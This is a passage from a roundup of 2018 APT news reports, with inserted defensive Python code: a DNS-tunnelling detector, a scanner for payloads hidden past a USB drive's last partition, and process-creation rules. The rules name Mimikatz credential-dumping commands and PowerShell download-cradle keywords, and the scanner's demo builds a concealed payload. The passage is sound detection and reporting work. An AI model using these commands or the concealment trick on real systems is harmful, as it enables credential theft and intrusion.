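2018-06-12T09:00:06 10.0.5.17 TXT 91bc0e4d77a2.5f0e3a9c1d8b.updates.example.net
2018-06-12T09:00:07 10.0.5.17 TXT ac44e91f0b27.0d7e6c5a4b39.updates.example.net
2018-06-12T09:00:08 10.0.5.17 TXT 3e8d7c6b5a49.f1e2d3c4b5a6.updates.example.net
2018-06-12T09:00:09 10.0.5.17 TXT 6b5a4938e7d1.a9b8c7d6e5f4.updates.example.net
2018-06-12T09:00:10 10.0.5.17 TXT c2d4e6f8a0b1.1a2b3c4d5e6f.updates.example.net
2018-06-12T09:00:12 10.0.5.22 A cdn.example.org
2018-06-12T09:00:13 10.0.5.22 A static.example.org
"""

LINE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<qtype>\S+) (?P<qname>\S+)$")
DATA_QTYPES = {"TXT", "NULL", "CNAME", "MX"}   # record types that can carry free-form payloads


def entropy(s):
    """Shannon entropy of a string in bits per character."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def base_domain(qname):
    """Registered domain approximated as the last two labels (assumption: no public-suffix list)."""
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])


def profile(log_text):
    """Aggregate per-base-domain statistics from the log text."""
    stats = defaultdict(lambda: {"queries": 0, "data_qtypes": 0, "subdomains": set(),
                                 "entropy_sum": 0.0, "max_len": 0})
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue                                    # skip malformed lines
        qtype, qname = m["qtype"].upper(), m["qname"].rstrip(".").lower()
        dom = base_domain(qname)
        sub = qname[: -len(dom)].rstrip(".") if qname != dom else ""
        s = stats[dom]
        s["queries"] += 1
        s["data_qtypes"] += qtype in DATA_QTYPES
        s["subdomains"].add(sub)
        s["entropy_sum"] += entropy(sub.replace(".", "").replace("-", ""))
        s["max_len"] = max(s["max_len"], len(qname))
    return stats


def flag_domains(stats, min_queries=5):
    """Return [(domain, reasons)] for domains that match at least two tunnelling indicators."""
    flagged = []
    for dom, s in sorted(stats.items()):
        n = s["queries"]
        if n < min_queries:
            continue                                    # too little data to judge
        reasons = []
        if len(s["subdomains"]) / n > 0.8:
            reasons.append("nearly every query uses a unique subdomain")
        if s["data_qtypes"] / n >= 0.5:
            reasons.append("majority of queries use payload-carrying record types")
        if s["entropy_sum"] / n >= 3.0:
            reasons.append("high-entropy subdomain labels")
        if s["max_len"] > 40:
            reasons.append("unusually long query names")
        if len(reasons) >= 2:
            flagged.append((dom, reasons))
    return flagged


if __name__ == "__main__":
    for dom, reasons in flag_domains(profile(SAMPLE_LOG)):
        print(dom, "->", "; ".join(reasons))
```

Requiring two independent indicators keeps CDN and anti-spam lookups (many unique subdomains, but short, low-entropy and A/AAAA) from tripping the rule, while a beaconing script that encodes host data in TXT queries trips it after a handful of requests.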

Final thoughts
The combination of simple custom artefacts designed mainly to evade detection, with publicly available tools for later stages seems to be a well-established trend for certain sets of activity, like the ones found under the ‘Chinese-speaking umbrella’, as well as for many newcomers who find the entry barrier into APT cyberespionage activity non-existent.

The intermittent activity by many actors simply indicates they were never out of business. They might take small breaks to reorganize themselves, or to perform small operations that might go undetected on a global scale. Probably one of the most interesting cases is LuckyMouse, with aggressive new activity heavily related to the geopolitical agenda in Asia. It is impossible to know if there is any coordination with other actors who resurfaced in the region, but this is a possibility.

One interesting aspect is the high level of activity by Chinese-speaking actors against Mongolian entities over the last 10 months. This might be related to several summits between Asian countries – some related to new relations with North Korea – held in Mongolia, and to the country’s new role in the region.

There were also several alerts from NCSC and US CERT regarding Energetic Bear/Crouching Yeti activity. Even if it is not very clear how active this actor might be at the moment (the alerts basically warned about past incidents), it should be considered a dangerous, active and pragmatic actor very focused on certain industries. We recommend checking our latest analysis on Securelist because the way this actor uses hacked infrastructure can create a lot of collateral victims.

To recap, we would like to emphasize just how important networking hardware has become for advanced attackers. We have seen various examples during recent months and VPNFilter should be a wake-up call for those who didn’t believe this was an important issue.

New Attacks on Palestine Linked to 'Gaza Cybergang'
12.7.2018 securityweek  APT

The Gaza Cybergang, an advanced persistent threat (APT) group linked to the Palestinian terrorist organization Hamas, apparently continues to target organizations in the Middle East, researchers at Check Point revealed last week.

The attacks observed by the security firm started with a spear-phishing email carrying a self-extracting archive that stored a Word document and a malicious executable. The emails purported to come from the Palestinian Political and National Guidance Commission and the documents contained copies of media reports from various Palestinian news websites.

While the targeted user is busy looking at the document, a piece of malware is being installed on their system. The malware, an upgraded variant of Micropsia, a tool previously linked to the Gaza Cybergang, is capable of taking screenshots, stealing documents, rebooting the system, obtaining information about the compromised device, and killing itself.

These and other capabilities are provided by more than a dozen modules, each named after characters in the American TV show “The Big Bang Theory” and a popular Turkish TV series called “Resurrection: Ertugrul.” In a related malware sample, the modules are named after various BMW car models (e.g. BMW_x1, BMW_x8).

The main target of this campaign, which Check Point has dubbed “Big Bang,” appears to be the Palestinian Authority, the governing body of the emerging Palestinian autonomous regions of the West Bank and Gaza Strip.

Researchers believe the latest attacks started in March and evidence suggests that they could be the work of the Gaza Cybergang, which has been known to target the Palestinian Authority many times in the past years.

“Although the group behind it seems to be focused on carefully selecting their victims, using a custom-made info-stealer for intelligence gathering operations, due to its very nature it is difficult to assert what the ultimate goal of this campaign is. Indeed, the next stages of the attack may even still be in the works, not yet deployed or only deployed to selected few victims,” Check Point researchers wrote in a blog post.

Also known as Gaza Hackers Team and Molerats, the threat actor has been active since at least 2012. Its targets include Israel, Egypt, Saudi Arabia, the UAE, Iraq, the United States, and some European countries.

The group has occasionally suspended activity after security firms exposed its operations, but it has continued improving tools and techniques and expanding its list of targets.

One of the most recent reports on Gaza Cybergang was published in October 2017 by Kaspersky Lab. The security firm reported at the time that the group had been targeting organizations in the Middle East and North Africa (MENA) region, including an oil and gas company from which the hackers stole information for more than a year.

Cisco Talos also published a report on Gaza Cybergang last year, detailing attacks aimed at Palestinian law enforcement.

China-based TEMP.Periscope APT targets Cambodia’s elections
12.7.2018 securityaffairs APT

FireEye uncovered a large-scale Chinese phishing and hacking campaign, run by the TEMP.Periscope APT group, aimed at Cambodia’s elections.
Security researchers at FireEye have uncovered a large-scale Chinese phishing and hacking campaign aimed at Cambodia’s elections.

The hackers ran a remote access trojan (RAT) distribution and data exfiltration operation targeting the poll.

The experts from FireEye attributed the attacks to an APT group tracked as TEMP.Periscope, which in past operations targeted American engineering and maritime organizations.

FireEye found evidence of infection on systems used by election-related entities in Cambodia, including the National Election Commission, human rights advocates, an MP for the Cambodia National Rescue Party, two Cambodian diplomats in overseas posts, and some media outlets.

“FireEye has examined a range of TEMP.Periscope activity revealing extensive interest in Cambodia’s politics, with active compromises of multiple Cambodian entities related to the country’s electoral system. This includes compromises of Cambodian government entities charged with overseeing the elections, as well as the targeting of opposition figures.” reads the analysis published by FireEye.

“This campaign occurs in the run up to the country’s July 29, 2018, general elections.”

TEMP.Periscope used the same infrastructure of other campaigns against other targets, including the defense industrial base in the United States and a chemical company based in Europe.

Analyzing this campaign, FireEye found files on three open indexes operated by the attackers; in this way the company gathered information about the group’s TTPs and its targets. The activity on these servers extends from at least April 2017 to the present, with the most current operations focusing on Cambodia’s government and elections.

Two servers (chemscalere[.]com and scsnewstoday[.]com) are used to operate a typical command and control infrastructure and to host sites, while a third one, mlcdailynews[.]com, works as an active SCANBOX server.

SCANBOX is a web-based reconnaissance framework (profiling scripts served from a compromised or attacker-controlled site) that FireEye has monitored in various campaigns since 2015; the presence of a SCANBOX server suggested TEMP.Periscope was also planning to target individuals with an interest in US-East Asia politics, Russia, and NATO affairs in forthcoming campaigns.

The servers contain both malware and logs. Analysis of the logs from the three servers revealed:
Potential actor logins from an IP address located in Hainan, China that was used to remotely access and administer the servers, and interact with malware deployed at victim organizations.
Malware command and control check-ins from victim organizations in the education, aviation, chemical, defense, government, maritime, and technology sectors across multiple regions. FireEye has notified all of the victims that we were able to identify.
The malware present on the servers included both new families (DADBOD, EVILTECH) and previously identified malware families (AIRBREAK, EVILTECH, HOMEFRY, MURKYTOP, HTRAN, and SCANBOX) .
Cambodia TEMP.Periscope

The servers were administered by operators based in Hainan (one of the IP addresses, 112.66.188[.]28, is located in Hainan, China), and experts found two new malware families hosted on them, DADBOD and EVILTECH, alongside malware families detected in the past (AIRBREAK, HOMEFRY, MURKYTOP, HTRAN, and SCANBOX).

The most active tools of this campaign were the AIRBREAK backdoor, the HOMEFRY password cracker and dumper, the LUNCHMONEY uploader and a command line reconnaissance tool called MURKYTOP.

FireEye says it had seen these in previous campaigns, and it also spotted two new tools in the Cambodian operation. There’s a backdoor called EVILTECH, a Javascript-based RAT, and the DADBOD credential stealer.

Malware, function and details, as summarized by FireEye:
EVILTECH (backdoor): a JavaScript sample that implements a simple RAT with support for uploading, downloading, and running arbitrary JavaScript. During the infection process, EVILTECH is run on the system, which then causes a redirect and possibly the download of additional malware or a connection to another attacker-controlled system.
DADBOD (credential theft): a tool used to steal user cookies. Analysis of this malware is still ongoing.

The experts attributed the attacks to China. Other IP addresses involved in the campaign are associated with virtual private servers, but the researchers noticed that artifacts indicate the computers used to log in were, in all cases, configured with Chinese language settings.

“The activity uncovered here offers new insight into TEMP.Periscope’s activity.” concludes FireEye. “Notably, Cambodia has served as a reliable supporter of China’s South China Sea position in international forums such as ASEAN and is an important partner. While Cambodia is rated as Authoritarian by the Economist’s Democracy Index, the recent surprise upset of the ruling party in Malaysia may motivate China to closely monitor Cambodia’s July 29 elections”

BlackTech APT using stolen D-Link certificates to spread malware
11.7.2018 securityaffairs APT

A cyber-espionage group tracked as BlackTech is abusing code-signing certificates stolen from D-Link for the distribution of their malware.
Security experts from ESET discovered that an APT group tracked as BlackTech is using code-signing certificates stolen from Taiwanese-based tech firm D-Link and the security company Changing Information Technology Inc.

According to the experts, the cyber espionage group is highly skilled and most of its victims are in the East Asia region, particularly Taiwan.

The attackers used the certificates to sign the code of the Plead backdoor that has been in the wild since at least 2012.

The Plead backdoor was used by threat actors to exfiltrate confidential documents from Taiwanese government agencies and private organizations.

“We spotted this malware campaign when our systems marked several files as suspicious. Interestingly, the flagged files were digitally signed using a valid D-Link Corporation code-signing certificate.” reads the analysis published by ESET.

“The exact same certificate had been used to sign non-malicious D-Link software; therefore, the certificate was likely stolen.”

BlackTech APT

ESET reported the abuse to D-Link, which revoked the two certificates on July 3 and informed its customers that most of them should not be affected by the revocation.

“D-Link recently discovered that two of its code signing certificates were misappropriated. Upon discovery, we immediately decommissioned the certificates and investigated the issue.” reads the advisory published by D-Link.

“Like several other companies in Asia, D-Link was victimized by a highly active cyber espionage group which has been using PLEAD Malware to steal confidential information from companies and organizations based in East Asia, particularly in Taiwan, Japan, and Hong Kong. The two affected D-Link certificates were revoked, effective July 3rd, 2018. New certificates have been issued to resolve this problem.”

Taiwan-based Changing Information Technology Inc. revoked the abused certificate on July 4, but according to ESET, the hackers continued to use it to spread the malware.

ESET identified two different malware families that were abusing the stolen certificate, the Plead backdoor, and a related password stealer component that could gather saved passwords from Google Chrome, Microsoft Internet Explorer, Microsoft Outlook, and Mozilla Firefox.

The signed Plead backdoor is heavily obfuscated with junk code; it downloads from a remote server, or opens from the local disk, a small encrypted binary blob. This blob contains encrypted shellcode that downloads the final Plead backdoor module.

Why do attackers steal digital certificates?

Attackers sign malicious code with stolen certificates so that the malware looks like a legitimate application and passes security controls that trust a valid signature. A valid Authenticode signature therefore proves only that the holder of the private key signed the file, not that the publisher intended to; defenders should check the signer against the revocation dates published by the victim companies and treat code signed with a revoked certificate after its revocation date as malicious.

The most famous case of malware abusing code-signing certificates was the Stuxnet worm, which misused digital certificates stolen from RealTek and JMicron.

Iranian Charming Kitten APT group poses as Israeli cybersecurity firm in phishing campaign
3.7.2018 securityaffairs APT

Iranian APT groups continue to be very active; recently the Charming Kitten cyber spies attempted to pose as an Israeli cyber-security firm that had uncovered their previous hacking campaigns.
The Iranian Charming Kitten APT group, aka Newscaster or Newsbeef, launched spear phishing attacks against people interested in reading reports about it.

The Newscaster group made the headlines in 2014 when experts at iSight issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media.

The Iranian hackers used a network of fake accounts (the NEWSCASTER network) on the major social networks to spy on US officials and political staff worldwide, as reported in the analysis by iSIGHT Partners. The Charming Kitten group is also known for abusing open source security tools, including BeEF.

The threat actor targeted numerous entities in Iran, the U.S., Israel, the U.K. and other countries. The hackers also hit individuals involved in academic research, human rights, and the media.

ClearSky detailed the group’s activities during 2016-2017, the report includes information related to the infrastructure used by the APT and to a new strain of malware dubbed DownPaper.

The report also linked the hacker behind the HBO security breach to the Charming Kitten, and reveals the identities of two other alleged members of the group.

Recently the experts from the Israeli cyber-security firm ClearSky Security discovered that the Charming Kitten APT had created a rogue copy (clearskysecurity.net) of the company’s official website (clearskysec.com).

Charming Kitten

“Charming Kitten built a phishing website impersonating our company,” states ClearSky. “They copied pages from our public website and changed one of them to include a ‘sign in’ option with multiple services.”

“These sign-in options are all phishing pages that would send the victim’s credentials to the attackers,” ClearSky said. “Our legitimate website does not have any sign in option.”

ClearSky Cyber Security
#CharmingKitten built a phishing website impersonating our company. The fake website is clearskysecurity\.net (the real website is http://clearskysec.com ). They copied pages from our public website and changed one of them to include a "sign in" option with multiple services.

4:15 PM - Jul 1, 2018
The experts believe they have discovered the rogue website while the Iranian APT was still working on it.

“It seems that the impersonating website is still being built because some of the pages have error messages in them,” ClearSky added.

The experts discovered that the fake clearskysecurity.net domain was hosted on a server that was associated with the Charming Kitten APT by ClearSky last month.


ClearSky Cyber Security
Potentially #CharmingKitten put BeEF in The Jewish Journal, and set up fake domains of Deutsche Welle (Germany's public international broadcaster) and Frost&Sullivan:


More:https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.q59o3v69qjhh …

9:57 AM - Jun 12, 2018
The server was still hosting content from previous campaigns, a further clue linking it to the Iranian hacker group.

The website appears still under development, it is likely it was not yet involved in any hacking campaign.

As the website was not finished, ClearSky doesn’t believe the Iranian hackers managed to phish anyone yet. The website was taken down after a few hours of its discovery.

Iranian hackers are becoming even more aggressive even if experts believe that they are not particularly sophisticated.

Recently we discussed the OilRig gang has been using a new Trojan in attacks aimed at targets in the Middle East.

OilRig is just one of the Iran-linked hacker crews, other groups tracked by security experts are APT33, Rocket Kitten, Cobalt Gypsy (Magic Hound), Charming Kitten (aka Newscaster and NewsBeef) and CopyKittens.

China Tick APT group targeting air-gapped systems in Asia
26.6.2018 securityaffairs APT

Palo Alto Networks experts uncovered a new operation conducted by the cyber espionage group known as Tick APT that has been targeting a secure USB drive built by a South Korean defense company.
The Tick APT group has been active for at least a decade and is also tracked as Bronze Butler; it was first publicly documented in 2016 by Symantec, and experts believe it is a China-linked threat actor. Experts have highlighted the group’s ability to discover zero-day flaws in software used in a specific region, such as Japan and South Korea.

The group has been targeting a secure USB drive built by a South Korean defense company, likely with the intent of compromising air-gapped systems.

The experts reported that the Tick APT group mainly targets Japan and South Korea, but the threat actor has also targeted organizations in Russia, Singapore, and China.

The group has been observed using a variety of proprietary tools and custom malware, including Minzen, Daserf (aka Nioupale), Datper, and HomamDownloader.

“Recently, Palo Alto Networks Unit 42 discovered the Tick group targeted a specific type of secure USB drive created by a South Korean defense company.” reads the analysis published by PaloAlto Networks.

“The weaponization of a secure USB drive is an uncommon attack technique and likely done in an effort to spread to air-gapped systems, which are systems that do not connect to the public internet.”

The malicious code used in the recent attacks conducted by the Tick APT was specifically developed to target systems running Windows XP or Windows Server 2003.

According to the experts, the malware was developed with the intent of infecting older, out-of-support versions of Microsoft Windows running on air-gapped systems, which are often used in government and defense environments.

The experts added that they haven’t found public reports of the attack until now, likely because the threat actor used it many years ago.

“We have not identified any public reporting on this attack, and we suspect the Tick group used the malware described in this report in attacks multiple years ago. Based on the data collected, we do not believe this malware is part of any active threat campaign.” continues the report.

The experts believe the hackers managed to compromise a secure USB drive model, certified as secure by the South Korean ITSCC, and to plant the malware on a number of those devices.

Palo Alto Networks reported that the APT group also developed a strain of malware dubbed SymonLoader that, once installed on an older Windows system, looks for specific USB drives.

SymonLoader was used by the attackers to load and execute the malware stored on the secure USB drive. At this time it is not clear how the attackers compromised the USB drives.

“Because we do not have either a compromised USB drive or the unknown malicious file, we are also unable to determine how these USB drives have been compromised.” continues Palo Alto.

“Specifically, we do not know if there has been a successful compromise in the supply-chain making these devices, or if these have been compromised post-manufacturing and distributed using other means such as social engineering.”

tick APT malware

During the investigation, experts at Palo Alto Networks discovered an interesting sample of the malware on January 21, 2018: a Trojanized version of a Japanese-language Go game that drops malware.

Experts associated this sample with the Tick group because the shellcode in the Trojanized Japanese game is exactly the same as that found in the Trojanized Korean programs.

“The attacker encrypted the unknown executable file and concealed it at the ending part of the secure USB storage in advance. The hidden data is not accessible through logical file operation APIs, such as ReadFile(). Instead, SymonLoader uses Logical Block Addressing (LBA) and SCSI commands to read the data physically from the particular expected location on the removable drive,” the researchers explain.
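To make the storage trick concrete, here is an added example (written for this page, not Palo Alto Networks' code and not the SymonLoader logic itself) that reads a drive image by logical block address rather than through file APIs, locates the sectors past the last partition, and flags non-zero, high-entropy data there: those sectors belong to no filesystem, so ReadFile() can never return them, which is why a raw LBA read is needed both to plant and to find such a payload. The disk image, the partition layout and the XOR/SHA-256 "encryption" standing in for the unknown cipher are all constructed for the example; on a real device the same reads go to the raw block device (/dev/sdX or \\.\PhysicalDriveN) instead of a BytesIO, and the entropy threshold needs tuning against the drive model's normal unallocated fill.

```python
import hashlib
import io
import math
import struct

SECTOR = 512


def parse_mbr_partitions(mbr):
    """Return (start_lba, sector_count) for each used entry in a classic MBR partition table."""
    if len(mbr) < SECTOR or mbr[510:512] != b"\x55\xaa":
        raise ValueError("sector 0 does not carry an MBR signature")
    parts = []
    for i in range(4):
        off = 446 + 16 * i                       # four 16-byte entries at offset 446
        ptype = mbr[off + 4]
        start, count = struct.unpack_from("<II", mbr, off + 8)
        if ptype and count:
            parts.append((start, count))
    return parts


def read_lba(dev, lba, count):
    """Read `count` whole sectors at logical block `lba`: raw device reads, no filesystem involved."""
    dev.seek(lba * SECTOR)
    data = dev.read(count * SECTOR)
    if len(data) != count * SECTOR:
        raise IOError("short read at LBA %d" % lba)
    return data


def shannon_entropy(data):
    """Entropy in bits per byte: 8.0 for uniformly random data, 0.0 for a constant fill."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def scan_tail_slack(dev, device_sectors, entropy_threshold=7.0):
    """Look past the last MBR partition: those sectors belong to no filesystem, so file APIs
    never see them, but non-zero, high-entropy content there is exactly where a payload hides."""
    parts = parse_mbr_partitions(read_lba(dev, 0, 1))
    last_end = max(s + c for s, c in parts) if parts else 1
    slack = device_sectors - last_end
    if slack <= 0:
        return {"slack_sectors": 0, "entropy": 0.0, "suspicious": False}
    tail = read_lba(dev, last_end, slack)
    ent = shannon_entropy(tail)
    return {"slack_sectors": slack, "start_lba": last_end,
            "entropy": round(ent, 2), "suspicious": any(tail) and ent >= entropy_threshold}


def fake_encrypt(plaintext, key):
    """Stand-in for the unknown cipher (an assumption): XOR with a SHA-256 counter keystream."""
    stream = b""
    ctr = 0
    while len(stream) < len(plaintext):
        stream += hashlib.sha256(key + ctr.to_bytes(4, "little")).digest()
        ctr += 1
    return bytes(p ^ k for p, k in zip(plaintext, stream))


def build_image(total_sectors, part_sectors, tail_payload=b""):
    """Constructed drive image: MBR, one FAT32-typed partition of low-entropy 'file data',
    and an optional payload parked at the very end of the device, after the partition."""
    mbr = bytearray(SECTOR)
    struct.pack_into("<B3sB3sII", mbr, 446, 0x80, b"\0\0\0", 0x0C, b"\0\0\0", 1, part_sectors)
    mbr[510:512] = b"\x55\xaa"
    fs_area = (b"FILE DATA " * 52)[:SECTOR] * part_sectors
    tail_len = (total_sectors - 1 - part_sectors) * SECTOR
    if len(tail_payload) > tail_len:
        raise ValueError("payload does not fit behind the partition")
    return io.BytesIO(bytes(mbr) + fs_area + tail_payload.rjust(tail_len, b"\0"))


if __name__ == "__main__":
    payload = fake_encrypt(b"MZ" + b"\x90" * 4094, b"secret-key")
    print("clean:", scan_tail_slack(build_image(64, 55), 64))
    print("hidden:", scan_tail_slack(build_image(64, 55, payload), 64))
```

The check deliberately compares the partition table's own end against the device size rather than trusting the filesystem: a drive that reports more sectors than its partitions account for has a tail that is worth reading, and a tail that is all zeros is ordinary slack while a tail that looks like ciphertext is not.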

Further details, including the IoCs are reported in the analysis published by the experts.

Lazarus APT hackers leverages HWP Documents in a recent string of attacks
26.6.2018 securityaffairs APT

Security researchers at AlienVault uncovered a series of cyber attacks on cryptocurrency exchanges leveraging weaponized Hangul Word Processor (HWP) documents.
The string of attacks involving HWP documents has been attributed to the North Korea-linked Lazarus APT group and includes the hack of the South Korean virtual currency exchange Bithumb. The hackers managed to steal roughly $32 million worth of cryptocurrency; it was the second security breach suffered by the exchange, and it caused the shutdown of the service. The first attack was also attributed to the Lazarus APT group.

The activity of the Lazarus Group surged in 2014 and 2015; its members mostly use custom-tailored malware in their attacks, and the experts who have investigated the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it has been involved in both cyber espionage campaigns and sabotage activities aimed at destroying data and disrupting systems. Security researchers discovered that the North Korean Lazarus APT group was behind recent attacks on banks, including the Bangladesh cyber heist.

According to security experts, the group was also behind other large-scale campaigns against targets worldwide, including Operation Troy, Operation DarkSeoul, and the Sony Pictures hack.

Recently the group hit several banks in Latin America stealing tens of millions of dollars.

Earlier this month, experts at AlienVault reported that Lazarus APT has been leveraging an ActiveX zero-day vulnerability in attacks on South Korean targets.

A couple of days ago, experts at AlienVault discovered a series of weaponized documents targeting members of a recent G20 Financial Meeting.

“One malicious document appears to be targeting members of a recent G20 Financial Meeting, seeking coordination of the economic policies between the wealthiest countries. Another is reportedly related to the recent theft of $30 million from the Bithumb crypto-currency exchange in South Korea.” reads the analysis published by AlienVault.

The HWP documents used in the recent attacks include malicious PostScript code that downloads the second-stage malware (either a 32- or 64-bit version of Manuscrypt).

lazarus hwp documents

Reports published by South Korean organizations suggest the cyber heist from Bithumb leveraged malicious HWP files and started earlier, in May and June. The documents involved fake resumes and are linked to previous attacks by Lazarus.

“A report by a South Korean news organisation into the investigation by a South Korean security company into the thefts shows some very familiar looking malware samples that were sent to cryptocurrency organisations” continues Alien Vault.

“Whilst we can’t be certain this malware is responsible for the thefts from Bithumb, it seems a likely suspect,”

According to the experts, malicious HWP documents from Lazarus reportedly targeted cryptocurrency users in South Korea in June.

The attackers are also running phishing campaigns against the users of the exchange: the Lazarus APT registered a number of cryptocurrency phishing domains, an anomaly considering that in past attacks the hackers compromised legitimate sites instead. The registrations use the same phone number as the domain itaddnet[.]com.

“It’s clear that the thefts from Lazarus won’t stop anytime soon given the gains available – the (partially successful) attempt to steal $1 billion dollars from the Bank of Bangladesh represents 3% of North Korea’s reported GDP. Thefts from South Korean organisations have the double impact of weakening their closest competitor.” concluded AlienVault

Further details, including IoCs are reported in the analysis published by AlienVault.

According to the experts, North Korea is behind the SWIFT attacks in Latin America
24.6.2018 securityaffairs APT Hacking

SWIFT hackers continue to target banks worldwide; the latest string of attacks hit financial institutions across Latin America.
According to three people with knowledge of the matter cited by CyberScoop, the attacks were carried out by North Korea-linked APT groups that also targeted other banks.

Recent attacks hit Mexico's Bancomext and Chile's Bank of Chile; in both cases the attackers used a variant of the dreaded disk wiper KillDisk to infect the banks' systems and stole funds through the SWIFT payment system.

“North Korea was involved in both breaches, the sources said, adding that they were tied to others that haven’t yet been disclosed.” states Cyberscoop.

“Two sources reviewed inside information about the breach investigations, which are still ongoing. Confidential technical reports about the incidents are already being shared within private information sharing groups comprised of other financial institutions.”

Investigations conducted by many security firms into past breaches have consistently linked North Korea to attacks against SWIFT systems.

At this time the attack vector is not clear, but experts believe the hackers targeted the banks with spear-phishing campaigns or used credentials obtained from other breaches.

Bancomext and the Bank of Chile aren't the only victims: the Mexican financial institution Banorte suffered a similar security breach.

North Korea-linked hackers appear to be focused on financial institutions in Latin America, Eastern Europe, and Southeast Asia.

“SWIFT doesn’t comment on the attribution of cyberattacks – that is a question for law enforcement – but we can say that the cyber threat facing the financial community is fast increasing in terms of sophistication … [we’re unaware of] evidence that SWIFT’s own network or core messaging services have ever been compromised. Rather, in each of the incidents customers first suffered security breaches within their local environments.” reads a statement sent by a SWIFT spokesperson via email.

Once the hackers have penetrated an organization, they usually exploit weaknesses in the bank's funds “transfer initiation environments” to steal credentials and make fraudulent, irrevocable transfers.

The attackers also deployed “diversionary smokescreens,” using wiper malware to hamper attribution and incident response.

“Shared malware variants between the multiple incidents, known as “MBR Killer” and “Bootwreck/killdisk,” caused systems to wipe boot data and other forensic records. The North Korean hackers have been seen using a combination of different wipers in their attacks.” added CyberScoop.

“The group who attacked the Mexican bank used both in their attack,” said Fernando Merces, a senior threat researcher with Trend Micro, an international cybersecurity firm. “There was also an MBR Killer used in a Taiwanese bank a few years ago … The financial sector sees these attacks most frequently. The attacks have been seen globally.”

The use of MBR Killer alone is not evidence of the involvement of a specific threat actor, because its code was posted to a cybercrime forum and has been reused by a wide range of actors.

In this case, forensic experts collected other indicators suggesting the involvement of North Korea's Lazarus Group in Latin America.

“CyberScoop obtained a confidential intelligence report, labelled “TLP: Amber,” authored May 29 by New York-based intelligence firm Flashpoint. That report further connected MBR Killer to the Chile case. The report states that this module had been “leveraged to hide the evidence of successful bank network penetrations.”” concludes CyberScoop.

Even though the attackers attempted to destroy the evidence, analysis of the TTPs still allows the attack to be attributed to Pyongyang.

“Attackers often delete any evidence of fraudulent transactions on victim’s local system, but SWIFT can … [provide] the header data of the messages that SWIFT received from the impacted organization,” the SWIFT spokesperson added.

According to the Mexican financial media outlet El Financiero, hackers compromised Mexico's interbank transfer system, the “Sistema de Pagos Electrónicos Interbancarios” (SPEI), using FALLCHILL, a RAT associated with North Korea-linked APT groups.

China-linked Thrip APT group target defense and satellite firms
21.6.2018 securityaffairs  APT

Symantec has tracked a new APT group named Thrip that targeted satellite operators, telco companies and defense contractors in the US and Southeast Asia.
Chinese APT groups are always very active; experts at Symantec have tracked a new APT group named Thrip that has breached the systems of satellite operators, telecommunications companies and defense contractors in the United States and Southeast Asia.

The Thrip group has been active since 2013, but this is the first time Symantec publicly shared details of its activities.

“We’ve been monitoring Thrip since 2013 when we uncovered a spying campaign being orchestrated from systems based in China. Since our initial discovery, the group has changed its tactics and broadened the range of tools it used. Initially, it relied heavily on custom malware, but in this most recent wave of attacks, which began in 2017, the group has switched to a mixture of custom malware and living off the land tools. ” reads the analysis published by Symantec.

Thrip APT

Thrip used a combination of custom malware and legitimate tools in its attacks; the list of victims is long and includes a satellite communications operator.

The hackers targeted devices involved in operations and infected computers running software that monitors and controls satellites; this suggests the attackers may also be interested in sabotage.

Another victim of the group is a company specializing in geospatial imaging and mapping.

“[Thrip] targeted computers running MapXtreme GIS (Geographic Information System) software which is used for tasks such as developing custom geospatial applications or integrating location-based data into other applications. It also targeted machines running Google Earth Server and Garmin imaging software.” continues the analysis.

“The satellite operator wasn’t the only communications target Thrip was interested in. The group had also targeted three different telecoms operators, all based in Southeast Asia.”

The group also targeted three telecoms firms in Southeast Asia and a defense contractor.

The group's arsenal includes the data stealer Trojan.Rikamanu and its evolution Infostealer.Catchamas, which implements more sophisticated data-stealing features and evasion capabilities.

The APT group also used Trojan.Mycicil, a keylogger available for sale on Chinese underground marketplaces, as well as the Backdoor.Spedear and Trojan.Syndicasec malware.

Thrip also used many legitimate tools, including the Windows Sysinternals utility PsExec, PowerShell, Mimikatz, and the LogMeIn remote access software.
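Because the tools listed above are legitimate, detection has to key on how they are invoked rather than on file hashes. The following is an added example (not code from Symantec or from this article) of process-creation rules for the three of them that leave a command-line footprint: PsExec's PSEXESVC service binary on the target host, Mimikatz's module::command syntax (which survives renaming the executable), and PowerShell -EncodedCommand payloads, which the script decodes from UTF-16LE base64 before inspecting them. LogMeIn is left out because it is an installed remote-access product rather than a command-line artefact. The records are constructed in a Sysmon Event ID 1-like shape; the 198.51.100.7 address and the file paths are placeholders.

```python
import base64
import ntpath
import re

# "-e", "-ec", "-enc" and "-EncodedCommand" are all accepted by powershell.exe.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
MIMIKATZ_MODULES = ("sekurlsa::", "lsadump::", "privilege::debug", "kerberos::", "crypto::")
SUSPICIOUS_PS = ("iex", "invoke-expression", "downloadstring", "downloadfile",
                 "frombase64string", "-w hidden", "-windowstyle hidden")


def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload as text (PowerShell expects UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="ignore")
    except ValueError:
        return None


def classify(event):
    """Yield the rule names that match one process-creation record (Image + CommandLine)."""
    image = ntpath.basename(event.get("Image", "")).lower()
    cmd = event.get("CommandLine", "")
    low = cmd.lower()
    if image == "psexesvc.exe" or "psexesvc" in low:
        yield "psexec_service_side"          # PSEXESVC is dropped and started on the remote host
    if image in ("psexec.exe", "psexec64.exe"):
        yield "psexec_client"
    if any(m in low for m in MIMIKATZ_MODULES):
        yield "mimikatz_commandline"         # module::command syntax, whatever the EXE is called
    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            if any(k in decoded.lower() for k in SUSPICIOUS_PS) or any(k in low for k in SUSPICIOUS_PS):
                yield "powershell_encoded_download"
            else:
                yield "powershell_encoded_command"
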